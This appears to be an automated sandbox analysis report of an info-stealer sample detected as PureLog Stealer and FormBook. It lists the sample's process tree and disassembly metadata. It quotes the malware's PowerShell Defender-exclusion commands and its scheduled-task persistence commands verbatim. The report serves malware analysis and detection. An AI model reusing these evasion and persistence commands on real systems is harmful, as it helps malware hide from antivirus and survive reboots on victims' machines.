                                                                                                            Commandline:"C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
                                                                                                            Imagebase:0x8b0000
                                                                                                            File size:1'001'992 bytes
                                                                                                            MD5 hash:574C0E8C1D426321E95BD8476334F271
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1808502142.0000000003ED5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1808502142.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1812017169.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe"
                                                                                                            Imagebase:0x6a0000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe"
                                                                                                            Imagebase:0x6a0000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"
                                                                                                            Imagebase:0x3d0000
                                                                                                            File size:187'904 bytes
                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:7
                                                                                                            Start time:10:42:34
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:10:42:35
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                            Imagebase:0xb50000
                                                                                                            File size:45'984 bytes
                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2069017164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2082286321.0000000003CF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2070855400.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:9
                                                                                                            Start time:10:42:36
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            Imagebase:0x300000
                                                                                                            File size:1'001'992 bytes
                                                                                                            MD5 hash:574C0E8C1D426321E95BD8476334F271
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 55%, ReversingLabs
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:10
                                                                                                            Start time:10:42:38
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:12
                                                                                                            Start time:10:42:46
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp9222.tmp"
                                                                                                            Imagebase:0x3d0000
                                                                                                            File size:187'904 bytes
                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:13
                                                                                                            Start time:10:42:46
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:14
                                                                                                            Start time:10:42:47
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                            Imagebase:0x530000
                                                                                                            File size:45'984 bytes
                                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Target ID:17
                                                                                                            Start time:10:42:57
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe"
                                                                                                            Imagebase:0x40000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2943135814.0000000002270000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Target ID:18
                                                                                                            Start time:10:42:58
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\runas.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\runas.exe"
                                                                                                            Imagebase:0x670000
                                                                                                            File size:17'920 bytes
                                                                                                            MD5 hash:13646BC81C39130487DA538B2DED5B28
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2942858170.0000000002910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2942772610.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Target ID:19
                                                                                                            Start time:10:43:11
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe"
                                                                                                            Imagebase:0x40000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.2944930407.0000000005280000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Target ID:20
                                                                                                            Start time:10:43:24
                                                                                                            Start date:27/11/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:7.4%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:32
                                                                                                              Total number of Limit Nodes:5
                                                                                                              execution_graph 14837 133adf0 14840 133aed7 14837->14840 14838 133adff 14841 133aef9 14840->14841 14842 133af1c 14840->14842 14841->14842 14843 133b120 GetModuleHandleW 14841->14843 14842->14838 14844 133b14d 14843->14844 14844->14838 14845 133d7c0 DuplicateHandle 14846 133d856 14845->14846 14847 133d578 14848 133d5be GetCurrentProcess 14847->14848 14850 133d610 GetCurrentThread 14848->14850 14851 133d609 14848->14851 14852 133d646 14850->14852 14853 133d64d GetCurrentProcess 14850->14853 14851->14850 14852->14853 14854 133d683 GetCurrentThreadId 14853->14854 14856 133d6dc 14854->14856 14857 1334668 14858 133467a 14857->14858 14859 1334686 14858->14859 14861 1334783 14858->14861 14862 133479d 14861->14862 14866 1334887 14862->14866 14870 1334888 14862->14870 14867 13348af 14866->14867 14869 133498c 14867->14869 14874 13344e0 14867->14874 14871 13348af 14870->14871 14872 13344e0 CreateActCtxA 14871->14872 14873 133498c 14871->14873 14872->14873 14875 1335918 CreateActCtxA 14874->14875 14877 13359db 14875->14877
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ec10b82f10bb338d0d833b90ac272e63a9f0f17e688671c48394feacb26aed5c
                                                                                                              • Instruction ID: 11860d99f373c7ac6add1f586a2f38c7b4e7906dcc8e4637a7ec6601ba14e08b
                                                                                                              • Opcode Fuzzy Hash: ec10b82f10bb338d0d833b90ac272e63a9f0f17e688671c48394feacb26aed5c
                                                                                                              • Instruction Fuzzy Hash: FD61B570E012199FDF08DFA9D9949EEBBF2FF88304F148529D409AB364DB359946CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd087d13c7c3235d32f5b0aac363d71ecce3f18e03612d5f7ef200461ec65523
                                                                                                              • Instruction ID: 546d0e898d0eea0118639c1ea2b4137bdc904d14c6daffac71fbae42662e07fa
                                                                                                              • Opcode Fuzzy Hash: fd087d13c7c3235d32f5b0aac363d71ecce3f18e03612d5f7ef200461ec65523
                                                                                                              • Instruction Fuzzy Hash: 9251B370E012199FDF08DFA9D994AEEBBF2BF88304F148529D409AB364DB359946CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 574c242b1307df7d5b270340c8013b75ce6461f5e803462a88667e702f66e516
                                                                                                              • Instruction ID: 41e9b3b6ca1760e6f01c85bd5c30fd9d552c7d77584886a195bfa05e558dfcce
                                                                                                              • Opcode Fuzzy Hash: 574c242b1307df7d5b270340c8013b75ce6461f5e803462a88667e702f66e516
                                                                                                              • Instruction Fuzzy Hash: A1215B317493D65FC716677C082853D7FA6AFC2204B1A45BAD94ACB3D2EF24C80A8397

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 526 133d578-133d607 GetCurrentProcess 530 133d610-133d644 GetCurrentThread 526->530 531 133d609-133d60f 526->531 532 133d646-133d64c 530->532 533 133d64d-133d681 GetCurrentProcess 530->533 531->530 532->533 535 133d683-133d689 533->535 536 133d68a-133d6a2 533->536 535->536 539 133d6ab-133d6da GetCurrentThreadId 536->539 540 133d6e3-133d745 539->540 541 133d6dc-133d6e2 539->541 541->540
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0133D5F6
                                                                                                              • GetCurrentThread.KERNEL32 ref: 0133D633
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0133D670
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0133D6C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 7c478a79d26d10d80a9494c10a2d335262aae2bce8fc9681c3f431d7fc34574a
                                                                                                              • Instruction ID: 5719ef6ebcd67a24f81e4f3440142f4173683152e46e73d86c86acba5d861fc2
                                                                                                              • Opcode Fuzzy Hash: 7c478a79d26d10d80a9494c10a2d335262aae2bce8fc9681c3f431d7fc34574a
                                                                                                              • Instruction Fuzzy Hash: AD5167B4D002498FDB08CFAAD548BDEBBF5BF88318F208559D419A7360D7349984CF69

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 570 133aed7-133aef7 571 133af23-133af27 570->571 572 133aef9-133af06 call 133a240 570->572 574 133af3b-133af7c 571->574 575 133af29-133af33 571->575 577 133af08 572->577 578 133af1c 572->578 581 133af89-133af97 574->581 582 133af7e-133af86 574->582 575->574 625 133af0e call 133b180 577->625 626 133af0e call 133b17f 577->626 578->571 583 133afbb-133afbd 581->583 584 133af99-133af9e 581->584 582->581 589 133afc0-133afc7 583->589 586 133afa0-133afa7 call 133a24c 584->586 587 133afa9 584->587 585 133af14-133af16 585->578 588 133b058-133b118 585->588 591 133afab-133afb9 586->591 587->591 620 133b120-133b14b GetModuleHandleW 588->620 621 133b11a-133b11d 588->621 592 133afd4-133afdb 589->592 593 133afc9-133afd1 589->593 591->589 595 133afe8-133aff1 call 133a25c 592->595 596 133afdd-133afe5 592->596 593->592 601 133aff3-133affb 595->601 602 133affe-133b003 595->602 596->595 601->602 603 133b021-133b02e 602->603 604 133b005-133b00c 602->604 611 133b051-133b057 603->611 612 133b030-133b04e 603->612 604->603 606 133b00e-133b01e call 133a26c call 133a27c 604->606 606->603 612->611 622 133b154-133b168 620->622 623 133b14d-133b153 620->623 621->620 623->622 625->585 626->585
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B13E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 20018373a3f89381c61cf4a7f2fee064b844df7e8b4b181c5b79b1049e48aa8a
                                                                                                              • Instruction ID: 5eea3c1b44ff7c987f81b8e4f914d659d1d60ecb16d73096e3da06467c6065fe
                                                                                                              • Opcode Fuzzy Hash: 20018373a3f89381c61cf4a7f2fee064b844df7e8b4b181c5b79b1049e48aa8a
                                                                                                              • Instruction Fuzzy Hash: 6C8144B0A00B458FD725DF29D45479ABBF1FF88308F008A2ED48ADBA50D735E849CB95

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 735 13344e0-13359d9 CreateActCtxA 738 13359e2-1335a3c 735->738 739 13359db-13359e1 735->739 746 1335a4b-1335a4f 738->746 747 1335a3e-1335a41 738->747 739->738 748 1335a51-1335a5d 746->748 749 1335a60 746->749 747->746 748->749 751 1335a61 749->751 751->751
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013359C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 566e22680c3209076fb8a2a49d98450bde6c92f9302fcfc285cfcb8cb1f6cdfc
                                                                                                              • Instruction ID: 2f77abc9d5e1077c04428a2b2dbdecb4b94d19a4dbac5dc048fa470493841372
                                                                                                              • Opcode Fuzzy Hash: 566e22680c3209076fb8a2a49d98450bde6c92f9302fcfc285cfcb8cb1f6cdfc
                                                                                                              • Instruction Fuzzy Hash: 9A41D0B0C0075DCBDB25CFA9C884B9EBBF5BF89304F24806AD408AB255DB756946CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 752 1335913-13359d9 CreateActCtxA 754 13359e2-1335a3c 752->754 755 13359db-13359e1 752->755 762 1335a4b-1335a4f 754->762 763 1335a3e-1335a41 754->763 755->754 764 1335a51-1335a5d 762->764 765 1335a60 762->765 763->762 764->765 767 1335a61 765->767 767->767
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 013359C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: c86c77b3b648e6e13e218e54262db6b23d28df85dbbda1c8f576759b3c0d2f13
                                                                                                              • Instruction ID: 536c6034044cc5479985b03133a9d01ac724be86ef7ad49e0ff9e8626a24628d
                                                                                                              • Opcode Fuzzy Hash: c86c77b3b648e6e13e218e54262db6b23d28df85dbbda1c8f576759b3c0d2f13
                                                                                                              • Instruction Fuzzy Hash: DB41C2B1C00759CEDB25CFA9C884BDEBBF5BF89304F24806AD408AB255DB755946CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 768 133d7c0-133d854 DuplicateHandle 769 133d856-133d85c 768->769 770 133d85d-133d87a 768->770 769->770
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D847
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 0c9219d840502e7358fc0f6f9a51dedd9d9e194889926c5346183e4562ac0454
                                                                                                              • Instruction ID: d7d7a8b774eb35920e06b2b3b6daf6a00e9bbd4ff4a94288b6ba7b4e4afc241b
                                                                                                              • Opcode Fuzzy Hash: 0c9219d840502e7358fc0f6f9a51dedd9d9e194889926c5346183e4562ac0454
                                                                                                              • Instruction Fuzzy Hash: 3621E2B59002089FDB10CFAAD984ADEBFF8EB48324F14801AE918A7310C374A944CFA4

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 773 133b0d8-133b118 774 133b120-133b14b GetModuleHandleW 773->774 775 133b11a-133b11d 773->775 776 133b154-133b168 774->776 777 133b14d-133b153 774->777 775->774 777->776
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0133B13E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1802779052.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1330000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: b8e417bc757762db2b3626eadae81fa1ea98a5be077cc3792c1fc5f4ac5a75d3
                                                                                                              • Instruction ID: 58ca09ba5dd45413b41c6c26140549ae57252b106dd38fe8d57e051b4873821f
                                                                                                              • Opcode Fuzzy Hash: b8e417bc757762db2b3626eadae81fa1ea98a5be077cc3792c1fc5f4ac5a75d3
                                                                                                              • Instruction Fuzzy Hash: 5111E0B5C002498FDB10CF9AD844ADEFBF4AB88324F10842AD959A7314C375A545CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800899210.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12dd000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f07800970bcfbc69f279d55ef3b6d60c19ac86a1d07088981798bec3b0d2553
                                                                                                              • Instruction ID: b2e0524271251b7981f15ebd21e7e9a6d6718850adbaf303f2a18dbcbf5309a5
                                                                                                              • Opcode Fuzzy Hash: 9f07800970bcfbc69f279d55ef3b6d60c19ac86a1d07088981798bec3b0d2553
                                                                                                              • Instruction Fuzzy Hash: 48216771550648DFCB01DF58E9C0F27BF65FB88318F20C169E9090B296C336D446CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12ed000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09b31c710467beadb89a182b2020523ec124d592f3611a27e7ceed1a9b2a5273
                                                                                                              • Instruction ID: 62d1fc9ec67c14eb6e2d633798b2f41fb131d5f0c2902100a8154501533e04f7
                                                                                                              • Opcode Fuzzy Hash: 09b31c710467beadb89a182b2020523ec124d592f3611a27e7ceed1a9b2a5273
                                                                                                              • Instruction Fuzzy Hash: A1216470214208DFCB11DF68D9C8B26BFA1FB84314F68C56DD90A4B256C37BD407CA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1800980947.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12ed000_Pre Alert PO TVKJEANSA00967.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fcdb05f5c03d7461c0013761913e63bb9cff11e54e161be8f2ca44987fb0c308
                                                                                                              • Instruction ID: 2ff4960f4881194145a9fa1aca76cef6d897c87938053baf82d42d36d9d22294
                                                                                                              • Opcode Fuzzy Hash: fcdb05f5c03d7461c0013761913e63bb9cff11e54e161be8f2ca44987fb0c308
                                                                                                              • Instruction Fuzzy Hash: F3214975514208DFDB01DF98C5C8B26BBE5FB84324F60C56DD9094F297C376D446CA61
